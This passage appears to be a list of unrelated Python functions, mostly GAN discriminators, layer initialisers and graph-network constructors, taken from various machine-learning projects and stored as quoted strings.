'pix2pixHD_multiscale',\n opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids,\n not (opt.gan_mode == 'lsgan'), opt.num_D)\n\n self.criterionGAN = loss.GANLoss(opt.gan_mode, multiscale_D=opt.netD == 'pix2pixHD_multiscale').to(\n self.device)\n self.criterionVGG = loss.VGGLoss().to(self.device)\n self.criterionFeat = loss.FeatureMatchingLoss(opt.n_layers_D, opt.num_D)\n\n self.criterionSSIM = loss.SkimageLoss(partial(ssim, multichannel=True))\n self.criterionPSNR = loss.SkimageLoss(psnr)\n\n if opt.netG.startswith('pix2pixHD') and (opt.n_epochs_fix_global > 0):\n params_dict = dict(self.netG.named_parameters())\n netG_params = []\n for key, value in params_dict.items():\n if key.startswith('model' + str(opt.n_local_enhancers)):\n netG_params += [value]\n else:\n netG_params = self.netG.parameters()\n\n self.optimizer_G = torch.optim.Adam(netG_params, lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n\n if opt.load_pretrain:\n pretrained_path = '' if not self.isTrain else opt.load_pretrain\n self.load_network(self.netG, 'G', opt.epoch, pretrained_path)\n if self.isTrain:\n self.load_network(self.netD, 'D', opt.epoch, pretrained_path)\n\n self.real_A = None\n self.real_B = None\n self.fake_A = None\n self.fake_B = None\n self.loss_D_real = None\n self.loss_D_fake = None\n self.loss_D = None\n self.loss_G_GAN = None\n self.loss_Feat = None\n self.loss_VGG = None\n self.loss_G = None\n self.loss_SSIM = None\n self.loss_PSNR = None", "def __init__(self, hidden_shape, sigma_g=1.0, sigma_l=1.0, alpha=0.5,\n mode='gaus'):\n self.hidden_shape = hidden_shape\n self.mode = mode\n self.sigma_g = np.full(hidden_shape, sigma_g)\n self.sigma_l = np.full(hidden_shape, sigma_l)\n self.alpha = np.full(hidden_shape, alpha)\n self.centers = None\n self.weights = None", "def setUp(self):\n # The short NSC used in this example\n self.net_nsc = [\n (1, 4, 0, 0, 0), # Layer 1: Identity(input)\n (2, 1, 3, 1, 0), # Layer 2: Convolution(Layer1)\n (3, 1, 3, 2, 0), # Layer 3: Convolution(Layer2)\n (4, 5, 0, 1, 3), # Layer 4: Convolution(Layer1)\n (5, 7, 0, 0, 0), # Layer 5: Convolution(Layer4)\n ]", "def DCGAN_discriminator(img_dim, nb_patch, bn_mode, model_name=\"DCGAN_discriminator\", use_mbd=True):\n\n list_input = [Input(shape=img_dim, name=\"disc_input_%s\" % i) for i in range(nb_patch)]\n\n if K.image_dim_ordering() == \"th\":\n bn_axis = 1\n else:\n bn_axis = -1\n\n nb_filters = 64\n nb_conv = int(np.floor(np.log(img_dim[1]) / np.log(2)))\n list_filters = [nb_filters * min(8, (2 ** i)) for i in range(nb_conv)]\n\n # First conv\n x_input = Input(shape=img_dim, name=\"discriminator_input\")\n # x = Convolution2D(list_filters[0], 3, 3, subsample=(2, 2), name=\"disc_conv2d_1\", border_mode=\"same\")(x_input)\n # x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n # x = LeakyReLU(0.2)(x)\n\n x = MaxPooling2D(\n pool_size=(2, 2), strides=(2, 2))(x_input)\n x = Convolution2D(\n list_filters[0]/8, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same', name='disc_conv2d_1')(x)\n x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n e1 = Convolution2D(\n list_filters[0]/2, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n e2 = Convolution2D(\n list_filters[0]/2, 3, 3, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n x = merge(\n [e1, e2], mode='concat', concat_axis=bn_axis)\n\n # Next convs\n for i, f in enumerate(list_filters[1:]):\n name = \"disc_conv2d_fire_%s\" % (i + 2)\n # x = Convolution2D(f, 3, 3, subsample=(2, 2), name=name, border_mode=\"same\")(x)\n # x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n # x = LeakyReLU(0.2)(x)\n x = MaxPooling2D(\n pool_size=(2, 2), strides=(2, 2))(x)\n x = Convolution2D(\n f/8, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same', name=name)(x)\n x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n e1 = Convolution2D(\n f/2, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n e2 = Convolution2D(\n f/2, 3, 3, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n x = merge(\n [e1, e2], mode='concat', concat_axis=bn_axis)\n\n x_flat = Flatten()(x)\n x = Dense(2, activation='softmax', name=\"disc_dense\")(x_flat)\n\n PatchGAN = Model(input=[x_input], output=[x, x_flat], name=\"PatchGAN\")\n print(\"PatchGAN summary\")\n PatchGAN.summary()\n\n x = [PatchGAN(patch)[0] for patch in list_input]\n x_mbd = [PatchGAN(patch)[1] for patch in list_input]\n\n if len(x) > 1:\n x = merge(x, mode=\"concat\", name=\"merge_feat\")\n else:\n x = x[0]\n\n if use_mbd:\n if len(x_mbd) > 1:\n x_mbd = merge(x_mbd, mode=\"concat\", name=\"merge_feat_mbd\")\n else:\n x_mbd = x_mbd[0]\n\n num_kernels = 100\n dim_per_kernel = 5\n\n M = Dense(num_kernels * dim_per_kernel, bias=False, activation=None)\n MBD = Lambda(minb_disc, output_shape=lambda_output)\n\n x_mbd = M(x_mbd)\n x_mbd = Reshape((num_kernels, dim_per_kernel))(x_mbd)\n x_mbd = MBD(x_mbd)\n x = merge([x, x_mbd], mode='concat')\n\n x_out = Dense(2, activation=\"softmax\", name=\"disc_output\")(x)\n\n discriminator_model = Model(input=list_input, output=[x_out], name=model_name)\n\n return discriminator_model", "def __init__(self, **config):\n super(CNN, self).__init__()\n in_channel = [26] + config['cnn_target_filters']\n kernels = config['cnn_target_kernels']\n self.layer_size = len(config['cnn_target_filters'])\n self.visual_attention=config['visual_attention']\n self.concatenation=config['concatenation']\n self.convs = nn.ModuleList([nn.Conv1d(in_channels=in_channel[i],\n out_channels=in_channel[i + 1],\n kernel_size=kernels[i]) for i in range(self.layer_size)])\n self.convs = self.convs.float()\n self.attention = config['attention']\n protein_size = self.simulate_output((26, 1000))\n self.fc = nn.Linear(protein_size, config['hidden_dim_protein'])\n self.Attention=Attention(**config)", "def build_patch_discriminator_SN(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n #init = RandomNormal(stddev=0.02)\n init = 'glorot_uniform'\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims)\n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_SN_Block(input_layer, filters, k_size=k_size, name=name+'1')\n d = self.Conv2D_SN_Block(d, 2*filters, k_size=k_size, name=name+'2')\n d = self.Conv2D_SN_Block(d, 4*filters, k_size=k_size, name=name+'3')\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4')\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'5')\n\n if drop:\n d = Dropout(rate=0.5, name=name+'_dropout')(d, training=True)\n logits = ConvSN2D(1, k_size, strides=1, padding='same', kernel_initializer=init, name=name+'logits')(d)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator_'+name[-3:])\n if (summary):\n model.summary()\n return model", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self, n):\n super().__init__()\n self.n = n\n self.block_names = ['block4', 'block7', 'block8', 'block9', 'block10', 'block11']\n block_sizes = [512, 1024, 512, 256, 256, 256]\n for name, size in zip(self.block_names, block_sizes):\n setattr(self, name, nn.Conv2d(size, self.n*cfg.ASPECT_RATIOS, kernel_size=3, padding=1))", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' % (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def build_discriminator2D(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, extra_conv=False, summary=False, ln=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims) \n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_Block(input_layer, filters, k_size=k_size, name=name+'1', bn=False) # 30x30x32\n d = self.Conv2D_Block(d, 2*filters, k_size=k_size, ln=ln, name=name+'2') # 15x15x64\n d = self.Conv2D_Block(d, 4*filters, k_size=k_size, ln=ln, name=name+'3') # 8x8x128\n if extra_conv:\n d = self.Conv2D_Block(d, 8*filters, strides=2, k_size=k_size, ln=ln, name=name+'4') # 8x8x256 \n d = self.Conv2D_Block(d, 16*filters, strides=1, k_size=k_size, ln=ln, name=name+'5') # 8x8x256\n else:\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, ln=ln, name=name+'4')\n\n d = Flatten(name=name+'flatten')(d)\n if drop:\n d = Dropout(rate=rate, name=name+'dropout')(d, training=True)\n logits = Dense(1, activation='linear', kernel_initializer=RandomNormal(stddev=0.02), name=name+'dense')(d)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator')\n if (summary):\n model.summary()\n return model", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def init(self):\n self.reparam_layers = []\n if self.model_type == \"GCN\":\n for i in range(self.num_layers):\n if self.reparam_all_layers is True:\n is_reparam = True\n elif isinstance(self.reparam_all_layers, tuple):\n reparam_all_layers = tuple([kk + self.num_layers if kk < 0 else kk for kk in self.reparam_all_layers])\n is_reparam = i in reparam_all_layers\n else:\n raise\n if is_reparam:\n self.reparam_layers.append(i)\n setattr(self, \"conv{}\".format(i + 1),\n GCNConv(self.num_features if i == 0 else self.latent_size,\n self.latent_size if i != self.num_layers - 1 else self.num_classes,\n cached=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n sample_size=self.sample_size,\n bias=True if self.with_relu else False,\n val_use_mean=self.val_use_mean,\n normalize=self.normalize,\n ))\n # self.conv1 = ChebConv(self.num_features, 16, K=2)\n # self.conv2 = ChebConv(16, self.num_features, K=2)\n\n elif self.model_type == \"GAT\":\n latent_size = int(self.latent_size / 2) # Under the default setting, latent_size = 8\n for i in range(self.num_layers):\n if i == 0:\n input_size = self.num_features\n else:\n if self.struct_dropout_mode[0] == 'DNsampling' or (self.struct_dropout_mode[0] == 'standard' and len(self.struct_dropout_mode) == 3):\n input_size = latent_size * 8 * 2\n else:\n input_size = latent_size * 8\n if self.reparam_all_layers is True:\n is_reparam = True\n elif isinstance(self.reparam_all_layers, tuple):\n reparam_all_layers = tuple([kk + self.num_layers if kk < 0 else kk for kk in self.reparam_all_layers])\n is_reparam = i in reparam_all_layers\n else:\n raise\n if is_reparam:\n self.reparam_layers.append(i)\n setattr(self, \"conv{}\".format(i + 1), GATConv(\n input_size,\n latent_size if i != self.num_layers - 1 else self.num_classes,\n heads=8 if i != self.num_layers - 1 else 1, concat=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n val_use_mean=self.val_use_mean,\n struct_dropout_mode=self.struct_dropout_mode,\n sample_size=self.sample_size,\n ))\n if self.struct_dropout_mode[0] == 'DNsampling' or (self.struct_dropout_mode[0] == 'standard' and len(self.struct_dropout_mode) == 3):\n setattr(self, \"conv{}_1\".format(i + 1), GATConv(\n input_size,\n latent_size if i != self.num_layers - 1 else self.num_classes,\n heads=8 if i != self.num_layers - 1 else 1, concat=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n val_use_mean=self.val_use_mean,\n struct_dropout_mode=self.struct_dropout_mode,\n sample_size=self.sample_size,\n ))\n # On the Pubmed dataset, use heads=8 in conv2.\n \n else:\n raise Exception(\"Model_type {} is not valid!\".format(self.model_type))\n\n self.reparam_layers = sorted(self.reparam_layers)\n \n if self.model_type == \"GCN\":\n if self.with_relu:\n reg_params = [getattr(self, \"conv{}\".format(i+1)).parameters() for i in range(self.num_layers - 1)]\n self.reg_params = itertools.chain(*reg_params)\n self.non_reg_params = getattr(self, \"conv{}\".format(self.num_layers)).parameters()\n else:\n self.reg_params = OrderedDict()\n self.non_reg_params = self.parameters()\n else:\n self.reg_params = self.parameters()\n self.non_reg_params = OrderedDict()\n self.to(self.device)", "def __init__(self, vgg_net):\n super().__init__()\n # create a conv layer that corresponds to the first linear layer\n linear1 = vgg_net.classifier[0]\n conv = nn.Conv2d(512, 4096, 7, 7)\n\n # copy data into it\n conv.bias.data.copy_(linear1.bias.data)\n conv.weight.data.view(4096, -1).copy_(linear1.weight.data)\n\n # replace the layer in the sequential classifier part\n vgg_net.classifier = nn.Sequential(\n conv, nn.Flatten(1), *vgg_net.classifier[1:]\n )\n\n self.vgg_net = vgg_net", "def init_bn(bn):\n \n bn.bias.data.fill_(0.)\n bn.running_mean.data.fill_(0.)\n bn.weight.data.fill_(1.)\n bn.running_var.data.fill_(1.)", "def build_patch_discriminator(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n init = RandomNormal(stddev=0.02)\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims)\n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_Block(input_layer, filters, k_size=k_size, name=name+'1', bn=False)\n d = self.Conv2D_Block(d, 2*filters, k_size=k_size, name=name+'2')\n d = self.Conv2D_Block(d, 4*filters, k_size=k_size, name=name+'3')\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4')\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'5')\n\n if drop:\n d = Dropout(rate=0.5, name=name+'_dropout')(d, training=True)\n logits = Conv2D(1, k_size, strides=1, padding='same', kernel_initializer=init, name=name+'logits')(d)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator_'+name[-3:])\n if (summary):\n model.summary()\n return model", "def _init_layers(self) -> None:\n super()._init_layers()\n self.controller = nn.Conv2d(\n self.feat_channels, self.num_params, 3, padding=1)", "def discriminator():\n model = nn.Sequential(\n Flatten(),\n nn.Linear(784,256),\n nn.LeakyReLU(0.01, inplace=True),\n nn.Linear(256,256),\n nn.LeakyReLU(0.01, inplace=True),\n nn.Linear(256,1)\n )\n return model", "def discriminator(self, images): # pylint: disable=R0201\n return standard_discriminator(images)", "def __init__(self, cell, shape):\n self.cell = cell\n self.shape = shape\n self.dimension = cell.dimension\n self.Nsites = np.prod(shape) * self.cell.Nsites\n self.sites = np.zeros(self.shape+[self.cell.Nsites],dtype='object')\n self.bonds = []\n self.build_sites()\n self.build_bonds()", "def discriminator_model():\n\n Discriminator = Sequential(name='Discriminator')\n\n # Downsampling : 32x32x3 --> 16x16x64\n Discriminator.add(Conv2D(filters=64, kernel_size=(5, 5), strides=2, padding='same', \n kernel_initializer=RandomNormal(stddev=GAUSS_SD), \n input_shape=DISCRIMINATOR_INPUT))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 16x16x64 --> 8x8x128\n Discriminator.add(Conv2D(filters=128, kernel_size=(5, 5), strides=2, padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 8x8x128 --> 4x4x256\n Discriminator.add(Conv2D(filters=128, kernel_size=(5, 5), strides=2, padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 4x4x256 --> 2x2x512\n Discriminator.add(Conv2D(filters=512, kernel_size=(5, 5), strides=2, padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Fully Connected Layer (classifier) , 2x2x512 (2048) --> 1\n Discriminator.add(Flatten())\n Discriminator.add(Dropout(DROPOUT))\n Discriminator.add(Dense(1))\n\n return Discriminator", "def __init__(self, nunmbers_doors, immats, colors):\n self.numbers_doors = nunmbers_doors\n super().__init__(immats, colors)", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_rgb_dmd'] = True", "def discriminator_model_organs():\n # Initialize the weights\n init = tf.random_normal_initializer(0.0, 0.02)\n\n img_shape = (512, 512, 1)\n\n # Source and target image input\n source_img = tf.keras.Input(shape=img_shape)\n target_img = tf.keras.Input(shape=img_shape)\n\n # Concatenate images channel-wise\n src_tgt_img = Concatenate()([source_img, target_img]) # L: 512 x 512 x 1 # G: 256 x 256 x 1\n\n # C128\n d1 = Conv2D(filters=128, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n src_tgt_img) # L: 256 x 256 x 128 # G: 128 x 128 x 128 # RF: 4\n d1 = LeakyReLU(alpha=0.2)(d1)\n\n # C256\n d2 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d1) # L: 128 x 128 x 256 # G: 64 x 64 x 256 # RF: 10\n d2 = BatchNormalization()(d2)\n d2 = LeakyReLU(alpha=0.2)(d2)\n\n # C256\n d3 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d2) # L: 64 x 64 x 256 # G: 32 x 32 x 256 # RF: 22\n d3 = BatchNormalization()(d3)\n d3 = LeakyReLU(alpha=0.2)(d3)\n\n # C512\n d4 = Conv2D(filters=512, kernel_size=(4, 4), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d3) # L: 61 x 61 x 512 # G: 29 x 29 x 512 # RF: 46\n d4 = BatchNormalization()(d4)\n d4 = LeakyReLU(alpha=0.2)(d4)\n d4 = ZeroPadding2D()(d4) # L: 63 x 63 x 512 # G: 31 x 31 x 512\n\n # Patch output\n d5 = Conv2D(filters=1, kernel_size=(4, 4), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d4) # L: 60 x 60 x 1 # G: 28 x 28 x 1 # RF: 70\n output_patch = Activation('sigmoid')(d5)\n\n # Define model\n discriminator_model = tf.keras.Model([source_img, target_img], output_patch)\n return discriminator_model", "def _build(self, generation):\n with tf.variable_scope ('discriminator') as scope:\n \n image_unflatten = unflatten_layer ( self.images )\n gen_unflatten = unflatten_layer ( generation )\n\n # Conv Layer 1 - image\n conv1_out_image, params = conv_2d_layer (\n input = image_unflatten,\n neurons = CONV_1_N,\n filter_size = CONV_1_FILT,\n name = 'conv_1_img',\n visualize = True ) \n pool1_out_img = max_pool_2d_layer ( input = conv1_out_image, name = 'pool_1_img')\n lrn1_out_img = local_response_normalization_layer (pool1_out_img, name = 'lrn_1_img' ) \n \n # Conv Layer 1 - gen\n conv1_out_gen, params = conv_2d_layer (\n input = gen_unflatten,\n neurons = CONV_1_N,\n filter_size = CONV_1_FILT,\n params = params,\n name = 'conv_1_gen',\n visualize = False )\n\n pool1_out_gen = max_pool_2d_layer ( input = conv1_out_gen, name = 'pool_1_gen')\n lrn1_out_gen = local_response_normalization_layer (pool1_out_gen, name = 'lrn_1_gen' ) \n process_params(params, name = self.name)\n c1_params = params\n\n\n\n\n\n # Conv Layer 2 - image\n conv2_out_image, params = conv_2d_layer (\n input = lrn1_out_img,\n neurons = CONV_2_N,\n filter_size = CONV_2_FILT,\n name = 'conv_2_img' )\n\n pool2_out_img = max_pool_2d_layer ( input = conv2_out_image, name = 'pool_2_img')\n lrn2_out_img = local_response_normalization_layer (pool2_out_img, name = 'lrn_2_img' ) \n\n\n # Conv Layer 2 - gen\n conv2_out_gen, params = conv_2d_layer (\n input = lrn1_out_gen,\n neurons = CONV_2_N,\n filter_size = CONV_2_FILT,\n params = params,\n name = 'conv_2_gen' )\n\n pool2_out_gen = max_pool_2d_layer ( input = conv2_out_gen, name = 'pool_2_gen')\n lrn2_out_gen = local_response_normalization_layer (pool2_out_gen, name = 'lrn_2_gen' ) \n process_params(params, name = self.name)\n c2_params = params\n\n # Dropout Layer\n flat_gen = flatten_layer(lrn2_out_gen)\n flat_img = flatten_layer(lrn2_out_img)\n\n flat_gen_dropout = dropout_layer ( input = flat_gen,\n prob = self.dropout_prob,\n name = 'dropout_1_gen') \n\n flat_img_dropout = dropout_layer ( input = flat_img,\n prob = self.dropout_prob,\n name = 'dropout_1_img') \n\n\n\n # Dot Product Layer 1 -img\n fc1_out_img, params = dot_product_layer ( input = flat_img_dropout,\n neurons = HIDDEN_1,\n name = 'image_disc_dot_1')\n # Dot Product Layer 1 - gen\n fc1_out_gen, params = dot_product_layer ( input = flat_gen_dropout,\n params = params,\n neurons = HIDDEN_2,\n name = 'gen_disc_dot_1')\n\n process_params(params, name = self.name)\n d1_params = params\n \n ##\n fc1_out_gen_dropout = dropout_layer ( input = fc1_out_gen,\n prob = self.dropout_prob,\n name = 'dropout_2_gen') \n fc1_out_img_dropout = dropout_layer ( input = fc1_out_img,\n prob = self.dropout_prob,\n name = 'dropout_2_img')\n\n # Dot Product Layer 2 -img\n fc2_out_img, params = dot_product_layer ( input = fc1_out_img_dropout,\n neurons = HIDDEN_2,\n name = 'image_disc_dot_2')\n # Dot Product Layer 2 - gen\n fc2_out_gen, params = dot_product_layer ( input = fc1_out_gen_dropout,\n params = params,\n neurons = HIDDEN_2,\n name = 'gen_disc_dot_2')\n process_params(params, name = self.name)\n d2_params = params\n\n ##\n fc2_out_gen_dropout = dropout_layer ( input = fc2_out_gen,\n prob = self.dropout_prob,\n name = 'dropout_3_gen') \n fc2_out_img_dropout = dropout_layer ( input = fc2_out_img,\n prob = self.dropout_prob,\n name = 'dropout_3_img')\n\n # Dot Product Layer 1 -img\n self.real, params = dot_product_layer ( input = fc2_out_img_dropout,\n neurons = 1,\n activation = 'sigmoid',\n name = 'real')\n # Dot Product Layer 1 -gen\n self.fake, params = dot_product_layer ( input = fc2_out_gen_dropout,\n params = params,\n neurons = 1,\n activation = 'sigmoid',\n name = 'fake')\n\n process_params(params, name = self.name)\n d3_params = params\n self.params = [c1_params, c2_params, d1_params, d2_params, d3_params] \n\n\n with tf.variable_scope (self.name + '_objectives') as scope: \n with tf.variable_scope( self.name + 'discriminator_obj') as scope: \n # discriminator_obj = - 0.5 * tf.reduce_mean(log(self.real)) - \\\n # 0.5 * tf.reduce_mean(log(1-self.fake))\n discriminator_obj = 0.5 * tf.reduce_mean ((self.real-1)**2) + \\\n 0.5 * tf.reduce_mean ((self.fake)**2)\n tf.summary.scalar('discriminator_obj', discriminator_obj)\n tf.add_to_collection( self.name + '_objectives', discriminator_obj ) \n\n with tf.variable_scope (self.name + '_probabilites') as scope: \n tf.summary.scalar('fake_probability', tf.reduce_mean(self.fake))\n tf.summary.scalar('real_probability', tf.reduce_mean(self.real))\n \n self._cook_optimizer( \n lr = DIS_GAN_LR, \n optimizer = DIS_GAN_OPTIMIZER,\n l1_coeff = DIS_GAN_L1_COEFF,\n l2_coeff = DIS_GAN_WEIGHT_DECAY_COEFF)", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = 